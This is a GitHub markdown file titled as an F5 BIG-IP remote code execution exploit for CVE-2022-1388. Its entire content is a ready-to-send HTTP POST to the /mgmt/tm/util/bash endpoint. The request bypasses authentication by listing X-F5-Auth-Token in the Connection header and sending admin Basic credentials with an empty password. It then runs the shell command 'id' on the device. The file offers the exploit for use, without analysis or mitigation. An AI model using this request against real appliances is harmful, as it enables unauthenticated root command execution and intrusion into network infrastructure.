Skip to content

Latest commit

 

History

History
15 lines (13 loc) · 414 Bytes

F5 BIG-IP RCE exploitation (CVE-2022-1388).md

File metadata and controls

15 lines (13 loc) · 414 Bytes

F5 BIG-IP RCE EXP [ CVE-2022-1388 ]

POST /mgmt/tm/util/bash HTTP/1.1
Host:
Accept-Encoding: gzip, deflate
Accept: */*
Connection: close, X-F5-Auth-Token, X-Forwarded-For, Local-Ip-From-Httpd, X-F5-New-Authtok-Reqd, X-Forwarded-Server, X-Forwarded-Host
Content-type: application/json
X-F5-Auth-Token: anything
Authorization: Basic YWRtaW46
Content-Length: 42

{"command": "run", "utilCmdArgs": "-c id"}